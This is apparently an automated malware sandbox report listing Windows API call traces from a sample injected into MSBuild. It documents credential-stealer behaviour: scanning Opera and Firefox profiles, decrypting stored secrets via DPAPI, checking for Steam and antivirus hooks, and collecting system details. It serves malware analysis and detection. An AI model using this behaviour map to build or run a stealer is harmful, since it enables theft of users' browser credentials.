                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415534
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415547
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00436A88), ref: 00415559
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 0041556D
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                                                                        • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                                                                        • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(?,?), ref: 00415623
                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 00415637
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                                                                                                                      • String ID: %s\%s
                                                                                                                                                                                                                      • API String ID: 1150833511-4073750446
                                                                                                                                                                                                                      • Opcode ID: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
                                                                                                                                                                                                                      • Instruction ID: 7b4a02d1ce16c29d0e311cc455c9dd4e2592c9f450b56a316f79c40a9e4a8b0e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71515FB190021D9BCF64DF60CC89AC9B7BDAB48305F1045E6E609E3250EB369B89CF65
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?,\*.*,0043682E,0040CC6B,?,?), ref: 0040BFC5
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,00437470), ref: 0040BFE5
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,00437474), ref: 0040BFFF
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,Opera,00436843,00436842,00436837,00436836,00436833,00436832,0043682F), ref: 0040C08B
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                      • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                                                                      • API String ID: 2567437900-1710495004
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004151C2
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 004151E5
                                                                                                                                                                                                                      • GetDriveTypeA.KERNEL32(?), ref: 004151EE
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0041520E
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 00415229
                                                                                                                                                                                                                        • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414D1C
                                                                                                                                                                                                                        • Part of subcall function 00414CC8: FindFirstFileA.KERNEL32(?,?), ref: 00414D33
                                                                                                                                                                                                                        • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D4F
                                                                                                                                                                                                                        • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D60
                                                                                                                                                                                                                        • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
                                                                                                                                                                                                                        • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
                                                                                                                                                                                                                        • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DC2
                                                                                                                                                                                                                        • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
                                                                                                                                                                                                                        • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DFF
                                                                                                                                                                                                                        • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414E28
                                                                                                                                                                                                                        • Part of subcall function 00414CC8: lstrcatA.KERNEL32(?,?), ref: 00414E3D
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 0041524A
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 004152C4
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                                                                                                                      • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                                      • API String ID: 441469471-147700698
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?,00437570,004368A3,?,?,?), ref: 0040D647
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,00437574), ref: 0040D668
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,00437578), ref: 0040D682
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,prefs.js,0043757C,?,004368AE), ref: 0040D70E
                                                                                                                                                                                                                        • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 0040D7E8
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040D8B3
                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(?,?), ref: 0040D956
                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 0040D96A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                                                                                                                      • String ID: prefs.js
                                                                                                                                                                                                                      • API String ID: 893096357-3783873740
                                                                                                                                                                                                                      • Opcode ID: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                                                                                                                                                      • Instruction ID: 927356911e44c3405f4de0d2be1bd74ddf2f7452577bbc1ac17ea627ea54bfb8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38A11C71D001289BCF60FB65DD46BCD7375AF04318F4101EAA808B7292DB79AEC98F99
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?,00437424,00436822,?,?,?), ref: 0040B657
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,00437428), ref: 0040B678
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0043742C), ref: 0040B692
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,00437430,?,00436823), ref: 0040B71F
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 0040B780
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 0040ABE5: CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC8A
                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(?,?), ref: 0040B8EB
                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 0040B8FF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3801961486-0
                                                                                                                                                                                                                      • Opcode ID: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
                                                                                                                                                                                                                      • Instruction ID: de252c0fab1b0e9a2d3383b13184952b75e93cbc882370f7403094166be9312a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E812C7290021C9BCF20FB75DD46ADD7779AB04308F4501A6EC48B3291EB789E998FD9
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3_catch_GS.LIBCMT ref: 004124B2
                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124D4
                                                                                                                                                                                                                      • Process32First.KERNEL32(00000000,00000128), ref: 004124E4
                                                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 004124F6
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00412508
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00412521
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                                                                      • String ID: steam.exe
                                                                                                                                                                                                                      • API String ID: 1799959500-2826358650
                                                                                                                                                                                                                      • Opcode ID: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                                                                                                                                                                      • Instruction ID: 012bf4d8d1ff090a25d7979138f5f9e06e77e1c880a3c2a583d4811a910fbd8f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17012170A01224DFDB74DB64DD44BDE77B9AF08311F8001E6E409E2290EB388F90CB15
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      • GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                                                                                                                                                      • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                                                                                                                                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                                      • String ID: /
                                                                                                                                                                                                                      • API String ID: 507856799-4001269591
                                                                                                                                                                                                                      • Opcode ID: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
                                                                                                                                                                                                                      • Instruction ID: d89f910ec230dae430ffd6d330d852df9ea80ceecc6bcaa0146556bb21002fe4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75314F71900328AFCB20EF65DD89BDEB3B9AB04304F5045EAF519A3152D7B86EC58F54
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                                                                                                                                                      • Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1799959500-0
                                                                                                                                                                                                                      • Opcode ID: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
                                                                                                                                                                                                                      • Instruction ID: d2a27fa508e6c3a354df25509a6f4190b9582d57abc1eee0c1e907853c614cd1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B0162316002249BDB619B60DD44FEA76FD9B14301F8400E6E40DD2251EA798F949B25
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                                                                                                                                                      • LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                      • String ID: DPAPI
                                                                                                                                                                                                                      • API String ID: 2068576380-1690256801
                                                                                                                                                                                                                      • Opcode ID: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
                                                                                                                                                                                                                      • Instruction ID: 09c146c598fe2db9e3360274f95d94fd5a71afecc77b7c133579c0d37eeb6d97
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5901ECB5A01218EFCB04DFA8D88489EBBB9FF48754F158466E906E7341D7719F05CB90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                                                                                                                                                      • Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 907984538-0
                                                                                                                                                                                                                      • Opcode ID: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
                                                                                                                                                                                                                      • Instruction ID: df159de601ea63d42004a6701442e9789206b56ac97d0af79a31bc2d218e3f7e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB117371A00214ABDB21EB65DC85BED73A9AB48308F400097F905A3291DB78AEC59B69
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00410D7D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 362916592-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                                                                                                                      • GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$AllocateNameProcessUser
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1296208442-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2452939696-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418544), ref: 004014DF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcmpi
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1586166983-0

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
